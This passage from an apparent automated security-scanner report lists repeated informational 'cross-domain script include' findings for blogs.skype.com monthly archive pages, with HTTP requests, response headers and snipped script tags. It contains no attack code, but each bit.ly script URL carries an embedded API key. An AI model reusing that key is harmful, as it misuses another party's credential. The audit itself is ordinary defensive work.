</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.57. http://blogs.skype.com/en/2009/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/06/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:51 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 203279
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.58. http://blogs.skype.com/en/2009/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/07/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:50 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 125776
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.59. http://blogs.skype.com/en/2009/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/08/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:49 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 204408
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.60. http://blogs.skype.com/en/2009/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/09/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 163021
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.61. http://blogs.skype.com/en/2009/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/10/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:46 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 100515
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.62. http://blogs.skype.com/en/2009/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/11/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 183138
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.63. http://blogs.skype.com/en/2009/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/12/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:44 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 183916
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<p><script src="http://phoneboxexperiment.com/javascripts/phonebox.js"></script><script src="http://phoneboxexperiment.com/javascripts/skypeCheck.js"></script>
...[SNIP]...

18.64. http://blogs.skype.com/en/2010/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/01/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 182044
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.65. http://blogs.skype.com/en/2010/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/02/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 332415
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.66. http://blogs.skype.com/en/2010/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/03/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:39 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 292276
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.67. http://blogs.skype.com/en/2010/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/04/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:38 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 249793
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.68. http://blogs.skype.com/en/2010/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/05/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:36 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 363177
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.69. http://blogs.skype.com/en/2010/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/06/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:35 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 437288
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.70. http://blogs.skype.com/en/2010/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/07/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 585263
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.71. http://blogs.skype.com/en/2010/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/08/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:31 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 118021
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
